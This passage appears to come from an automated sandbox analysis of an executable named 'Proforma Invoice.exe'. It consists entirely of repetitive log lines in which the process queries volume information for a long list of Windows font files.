                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
